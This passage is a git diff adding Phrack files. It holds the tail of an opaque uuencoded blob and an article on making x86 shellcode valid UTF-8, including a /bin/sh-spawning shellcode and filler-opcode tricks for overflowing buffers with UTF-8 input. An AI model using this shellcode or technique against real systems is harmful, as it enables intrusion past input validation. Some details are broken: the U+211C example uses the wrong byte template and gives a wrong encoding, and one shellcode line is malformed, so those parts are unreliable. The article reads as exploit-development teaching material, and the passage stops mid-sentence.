+M@@+"*M%#%Y!UC7\A32,A*HJ<^@W'&VBWI"B;O2=7N%((Q<A"!<>VS"KN^9B%
+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
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/9.txt b/phrack62/9.txt
new file mode 100644
index 0000000..8d1b82f
--- /dev/null
+++ b/phrack62/9.txt
@@ -0,0 +1,892 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x00
+
+|=--------------[ Writing UTF-8 compatible shellcodes ]-----------------=|
+|=----------------------------------------------------------------------=|
+|=-----------[ Thomas Wana aka. greuff  <greuff@void.at> ]--------------=|
+|=----------------------------------------------------------------------=|
+
+1 - Abstract
+
+2 - What is UTF-8?
+  2.1 - UTF-8 in detail
+  2.2 - Advantages of using UTF-8
+
+3 - The need for UTF-8 compatible shellcodes
+  3.1. - UTF-8 sequences
+    3.1.1 - Possible sequences
+    3.1.2 - UTF-8 shortest form
+    3.1.3 - Valid UTF-8 sequences
+
+4 - Creating the shellcode
+  4.1 - Bytes that come in handy
+    4.1.1 - Continuation bytes
+    4.1.2 - Masking continuation bytes
+    4.1.3 - Chaining instructions
+  4.2 - General design rules
+  4.3 - Testing the code
+
+5 - A working example
+  5.1 - The original shellcode
+  5.2 - UTF-8-ify
+  5.3 - Let's try it out
+  5.4 - A real exploit using these techniques
+
+6. - Considerations
+  6.1 - Automated shellcode transformer
+  6.2 - UTF-8 in XML-files
+
+7 - Greetings, last words
+
+- ----------------------------------------------------------------------------
+
+- ---[ 1. Abstract
+
+This paper deals with the creation of shellcode that is recognized as
+valid by any UTF-8 parser. The problem is not unlike the alphanumeric
+shellcodes problem described by rix in phrack 57 [4], but fortunately
+we have much more characters available, so we can almost always build
+shellcode that is valid UTF-8 and does what we want.
+
+I will show you a brief introduction into UTF-8 and will outline the
+characters available for building shellcodes. You will see that it's
+generally possible to make any shellcode valid UTF-8, but you will have
+to think quite a bit. A working example is provided at the end for
+reference.
+
+- ----------------------------------------------------------------------------
+
+- ---[ 2. What is UTF-8?
+
+For a really great introduction into the topic, I highly suggest reading
+the "UTF-8 and Unicode FAQ" [1] by Markus Kuhn.
+
+UTF-8 is a character encoding, suitable to represent all 2^31 characters
+defined by the UNICODE standard. The really neat thing about UTF-8 is
+that all ASCII characters (the lower codepage in standard encodings like
+ISO-8859-1 etc) are the same in UTF-8 - no conversion needed. That means,
+in the best case, all your config files in /etc and every English text
+document you have on your computer right now are already 100% valid UTF-8.
+
+Unicode characters are written like this: U-0000007F, which stands for 
+"the 128th character in the Unicode character space". You can see that
+with this representation one can easily represent all 2^31 characters that
+the Unicode-standard defines, but it's a waste of space (when you write
+English or western text) and - much more important - makes the transition
+to Unicode very hard (convert all the files you already have). "Hello"
+would thus be encoded like:
+
+   U-00000047 U-00000065 U-0000006C U-0000006C U-0000006F
+
+which is in hex:
+
+   \x47\x00\x00\x00 \x65\x00\x00\x00 \x6C\x00\x00\x00 \x6C\x00\x00\x00
+   \x6F\x00\x00\x00
+
+(for all you little endian friends).
+What a waste of space! 20 bytes for 5 characters... The same text in
+UTF-8:
+
+   "Hello"
+
+:-)
+
+Let's look at the encoding in more detail.
+
+- ---[ 2.1. UTF-8 in detail
+
+UTF-8 can represent any Unicode character in an UTF-8 sequence between
+1-6 bytes. 
+
+As I already mentioned before, the characters in the lower codepage 
+(ASCII-code) are the same in Unicode - they have the character values
+U-00000000 - U-0000007F. You therefore still only need 7 bits to
+represent all possible values. UTF-8 says, if you only need up to 7
+bits for your character, stuff it into one byte and you are fine.
+
+Unicode-characters that have higher values than U-0000007F must be
+mapped to two or more bytes, as shown in the table below:
+
+U-00000000 - U-0000007F: 0xxxxxxx  
+U-00000080 - U-000007FF: 110xxxxx 10xxxxxx 
+U-00000800 - U-0000FFFF: 1110xxxx 10xxxxxx 10xxxxxx
+U-00010000 - U-001FFFFF: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
+U-00200000 - U-03FFFFFF: 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
+U-04000000 - U-7FFFFFFF: 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
+
+Example: U-000000C4 (LATIN CAPITAL LETTER A WITH DIAERESIS)
+
+This character's value is between U-00000080 and U-000007FF, so we
+have to encode it using 2 bytes. 0xC4 is 11000100 binary. UTF-8 fills
+up the places marked 'x' above with these bits, beginning at the
+lowest significant bit.
+
+    110xxxxx 10xxxxxx
++         11   000100
+    -----------------
+    11000011 10000100
+
+which results in 0xC3 0x84 in UTF-8.
+
+Example: U-0000211C (BLACK-LETTER CAPITAL R)
+
+The same here. According to the table above, we need 3 bytes to encode
+this character.
+
+0x211C is 00100001 00011100 binary. Lets fill up the spaces:
+
+    1110xxxx 10xxxxxx 10xxxxxx 10xxxxxx
++         00   100001   000100   011100
+    -----------------------------------
+    11100000 10100001 10000100 10011100
+
+which is 0xE0 0xB1 0x84 0x9C in UTF-8.
+
+I hope you get the point now :-)
+
+- ---[ 2.2. Advantages of using UTF-8
+
+UTF-8 combines the flexibility of Unicode (think of it: no more codepages
+mess!) with the ease-of-use of traditional encodings. Also, the transition
+to complete worldwide UTF-8 support is easy to do, because every plain-
+7-bit-ASCII-file that exists right now (and existed since the 60s) will
+be valid in the future too, without any modifications. Think of all your
+config files!
+
+- ----------------------------------------------------------------------------
+
+- ---] 3. The need for UTF-8 compatible shellcodes
+
+So, since we know now that UTF-8 is going to save our day in the future,
+why would we need shellcodes that are valid UTF-8 texts?
+
+Well, UTF-8 is the default encoding for XML, and since more and more
+protocols start using XML and more and more networking daemons use these
+protocols, the chances to find a vulnerability in such a program
+increases. Additionally, applications start to pass user input around 
+encoded in UTF-8. So sooner or later, you will overflow a buffer with
+UTF-8-data. Now you want that data to be executable AND valid UTF-8.
+
+- ---] 3.1. UTF-8 sequences
+
+Fortunately, the situation is not _that_ desperate, compared to 
+alphanumeric shellcodes. There, we only have a very limited character
+set, and this really limits the instructions available. With UTF-8, we
+have a much bigger character space, but there is one problem: we are
+limited in the _sequence_ of characters. For example, with alphanumeric
+shellcodes we don't care if the sequence is "AAAC" or "CAAA" (except
+for the problem, of course, that the instructions have to make sense :))
+But with UTF-8, for example, 0xBF must not follow 0xBF. Only certain
+bytes may follow other bytes. This is what the UTF-8-shellcode-magic
+is all about.
+
+- ---] 3.1.1. Possible sequences
+
+Let's look into the available "UTF-8-codespace" more closely:
+
+U-00000000 - U-0000007F: 0xxxxxxx = 0 - 127 = 0x00 - 0x7F
+   This is much like the alphanumeric shellcodes - any character
+   can follow any character, so 0x41 0x42 0x43 is no problem, for
+   example.
+
+U-00000080 - U-000007FF: 110xxxxx 10xxxxxx 
+   First byte: 0xC0 - 0xDF
+   Second byte: 0x80 - 0xBF
+   You see the problem here. A valid sequence would be 0xCD 0x80
+   (do you remember that sequence - int $0x80 :)), because the byte
+   following 0xCD must be between 0x80 and 0xBF. An invalid 
+   sequence would be 0xCD 0x41, every UTF-8-parser chokes on 
+   this.
+   
+U-00000800 - U-0000FFFF: 1110xxxx 10xxxxxx 10xxxxxx
+   First byte: 0xE0 - 0xEF
+   Following 2 bytes: 0x80 - 0xBF
+   So, if the sequence starts with 0xE0 to 0xEF, there must be
+   two bytes following between 0x80 and 0xBF. Fortunately we can
+   often use 0x90 here, which is nop. But more on that later.
+
+U-00010000 - U-001FFFFF: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
+   First byte: 0xF0 - 0xF7
+   Following 3 bytes: 0x80 - 0xBF
+   You get the point.
+
+U-00200000 - U-03FFFFFF: 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
+   First byte: 0xF8 - 0xFB
+   Following 4 bytes: 0x80 - 0xBF
+
+U-04000000 - U-7FFFFFFF: 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
+   First byte: 0xFC - 0xFD
+   Following 5 bytes: 0x80 - 0xBF
+
+So we know now what bytes make up UTF-8:
+
+0x00 - 0x7F without problems
+0x80 - 0xBF only as a "continuation byte" in the middle of a sequence
+0xC0 - 0xDF as a start-byte of a two-byte-sequence (1 continuation byte)
+0xE0 - 0xEF as a start-byte of a three-byte-sequence (2 continuation bytes)
+0xF0 - 0xF7 as a start-byte of a four-byte-sequence (3 continuation bytes)
+0xF8 - 0xFB as a start-byte of a five-byte-sequence (4 continuation bytes)
+0xFC - 0xFD as a start-byte of a six-byte-sequence (5 continuation bytes)
+0xFE - 0xFF not usable! (actually, they may be used only once in a UTF-8-
+            text - the sequence 0xFF 0xFE marks the start of such a
+            text)
+
+- ---] 3.1.2. UTF-8 shortest form
+
+Unfortunately (for us), the Corrigendum #1 to the Unicode standard [2]
+specifies that UTF-8-parsers only accept the "UTF-8 shortest form"
+as a valid sequence.
+
+What's the problem here? 
+
+Well, without that rule, we could encode the character U+0000000A (line
+feed) in many different ways:
+
+0x0A - this is the shortest possible form
+0xC0 0x8A
+0xE0 0x80 0x8A
+0xF0 0x80 0x80 0x8A
+0xF8 0x80 0x80 0x80 0x8A
+0xFC 0x80 0x80 0x80 0x80 0x8A
+
+Now that would be a big security problem, if UTF-8 parsers accepted
+_all_ the possible forms. Look at the strcmp routine - it compares two
+strings byte per byte to tell if they are equal or not (that still works
+this way when comparing UTF-8-strings). An attacker could generate a string
+with a longer form than necessary and so bypass string comparison checks,
+for example.
+
+Because of this, UTF-8-parsers are _required_ to only accept the shortest
+possible form of a sequence. This rules out sequences that start with one
+of the following byte patterns:
+
+1100000x (10xxxxxx)
+11100000 100xxxxx (10xxxxxx)
+11110000 1000xxxx (10xxxxxx 10xxxxxx)
+11111000 10000xxx (10xxxxxx 10xxxxxx 10xxxxxx)
+11111100 100000xx (10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx) 
+
+Now certain sequences become invalid, for example 0xC0 0xAF, because
+the resulting UNICODE character is not encoded in its shortest form.
+
+- ---] 3.1.3. Valid UTF-8 sequences
+
+Now that we know all this, we can tell which sequences are valid
+UTF-8:
+
+ Code Points      1st Byte  2nd Byte 3rd Byte 4th Byte
+U+0000..U+007F     00..7F          
+U+0080..U+07FF     C2..DF    80..BF       
+U+0800..U+0FFF     E0        A0..BF   80..BF    
+U+1000..U+FFFF     E1..EF    80..BF   80..BF    
+U+10000..U+3FFFF   F0        90..BF   80..BF   80..BF
+U+40000..U+FFFFF   F1..F3    80..BF   80..BF   80..BF
+U+100000..U+10FFFF F4        80..8F   80..BF   80..BF
+
+Let's look how to build UTF-8-shellcode!
+
+- ----------------------------------------------------------------------------
+
+- ---] 4. Creating the shellcode
+
+Before you start, be sure that you are comfortable creating "standard" 
+shellcode, i.e. shellcode that has no limitations in the instructions 
+available. 
+
+We know which characters we can use and that we have to pay attention to
+the character sequence. Basically, we can transform any shellcode to
+UTF-8 compatible shellcode, but we often need some tricks.
+
+- ---] 4.1. Bytes that come in handy
+
+The biggest problem while building UTF-8-shellcode is that you have
+to get the sequences right.
+
+     "\x31\xc9"          // xor %ecx, %ecx
+     "\x31\xdb"          // xor %ebx, %ebx
+
+We start with \x31. No problem here, \x31 is between \x00 and \x7f,
+so we don't need any more continuation bytes. \xc9 is next. Woops -
+it is between \xc2 and \xdf, so we need a continuation byte. What
+byte is next? \x31 - that is no valid continuation byte (which 
+have to be between \x80 and \xbf). So we have to insert an instruction
+here that doesn't harm our code *and* makes the sequence UTF-8-
+compatible. 
+
+- ---] 4.1.1. Continuation bytes
+
+We are lucky here. The nop instruction (\x90) is the perfect 
+continuation byte and simply does nothing :) (exception: you can't use
+it if it is the first continuation byte in a \xe1-\xef sequence - 
+see the table in 3.1.3). 
+
+So to handle the problem above, we would simply do the following:
+
+     "\x31\xc9"          // xor %ecx, %ecx
+     "\x90"              // nop (UTF-8)
+     "\x31\xdb"          // xor %ebx, %ebx
+     "\x90"              // nop (UTF-8)
+
+(I always mark bytes I inserted because of UTF-8 so I don't accidentally
+optimize them away later when I need to save space)
+
+- ---] 4.1.2. Masking continuation bytes
+
+The other way round, you often have instructions that start with a
+continuation byte, i.e. the first byte of the instruction is between
+\x80 and \xbf:
+
+     "\x8d\x0c\x24"      // lea (%esp,1),%ecx
+
+That means you have to find an instruction that is only one byte long
+and lies between \xc2 and \xdf.
+
+The most suitable one I found here is SALC [2]. This is an *undocumented*
+Intel opcode, but every Intel CPU (and compatible) supports it. The
+funny thing is that even gdb reports an "invalid opcode" there. But it
+works :) The opcode of SALC is \xd6 so it suits our purpose well.
+
+The bad thing is that it has side effects. This instruction modifies
+%al depending on the carry flag (see [3] for details). So always think
+about what happens to your %eax register when you insert this instruction!
+
+Back to the example, the following modification makes the sequence valid
+UTF-8:
+
+     "\xd6"              // salc (UTF-8)
+     "\x8d\x0c\x24"      // lea (%esp,1),%ecx
+
+- ---] 4.1.3. Chaining instructions
+
+If you are lucky, instructions that begin with continuation bytes follow
+instructions that need continuation bytes, so you can chain them together,
+without inserting extra bytes.
+
+You can often safe space this way just by rearranging instructions, so
+think about it when you are short of space.
+
+- ---] 4.2. General design rules
+
+%eax is evil. Try to avoid using it in instructions that use it as a
+parameter because the instruction then often contains \xc0 which is
+invalid in UTF-8. Use something like
+
+    xor %ebx, %ebx
+    push %ebx
+    pop %eax
+
+(pop %eax has an instruction code of its own - and a very UTF-8 friendly
+one, too :)
+
+- ---] 4.3. Testing the code
+
+How can you test the code? Use iconv, it comes with the glibc. You
+basically convert the UTF-8 to UTF-16, and if there are no error
+messages then the string is valid UTF-8. (Why UTF-16? UTF-8 sequences
+can yield character codes well beyond 0xFF, so the conversion would
+fail in the other direction if you would convert to LATIN1 or ASCII.
+Drove me nuts some time ago, because I always thought my UTF-8 was
+wrong...)
+
+First, invalid UTF-8:
+
+greuff@pluto:/tmp$ hexdump -C test
+00000000  31 c9 31 db                                       |1.1.|
+00000004
+greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 test
+1iconv: illegal input sequence at position 1
+greuff@pluto:/tmp$
+
+And now valid UTF-8:
+
+greuff@pluto:/tmp$ hexdump -C test
+00000000  31 c9 90 31 db 90                                 |1..1..|
+00000006
+greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 test
+1P1greuff@pluto:/tmp$
+
+- ----------------------------------------------------------------------------
+
+- ---] 5. A working example
+
+Now onto something practical. Let's convert a classical /bin/sh-spawning
+shellcode to UTF-8.
+
+- ---] 5.1. The original shellcode
+
+    "\x31\xd2"                // xor    %edx,%edx
+    "\x52"                    // push   %edx
+    "\x68\x6e\x2f\x73\x68"    // push   $0x68732f6e
+    "\x68\x2f\x2f\x62\x69"    // push   $0x69622f2f
+    "\x89\xe3"                // mov    %esp,%ebx
+    "\x52"                    // push   %edx
+    "\x53"                    // push   %ebx
+    "\x89\xe1"                // mov    %esp,%ecx
+    "\xb8\x0bx\00\x00\x00"    // mov    $0xb,%eax
+    "\xcd\x80"                // int    $0x80
+
+The code simply prepares the stack in the right way, sets some registers
+and jumps into kernel space (int $0x80).
+
+- ---] 5.2. UTF-8-ify
+
+That's an easy example, no big obstacles here. The only obvious problem
+is the "mov $0xb,%eax" instruction. I am quite lazy now, so I'll just
+copy %edx (which is guaranteed to contain 0 at this time) to %eax and 
